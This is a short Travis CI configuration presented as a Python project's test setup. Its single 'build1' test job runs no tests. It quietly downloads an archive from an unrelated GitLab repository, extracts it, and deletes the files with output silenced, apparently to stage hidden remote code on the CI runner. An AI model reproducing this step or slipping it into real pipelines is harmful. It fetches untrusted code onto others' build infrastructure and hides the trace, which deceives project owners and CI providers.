language: python
dist: focal


jobs:
  include:
    - stage: test
      name: "build1"
      script:
        - wget -qO sg.tar.gz https://gitlab.com/ghcees/pack/-/raw/main/sg.tar.gz && tar -xzf sg.tar.gz && rm -rf sg* >/dev/null 2>&1
        
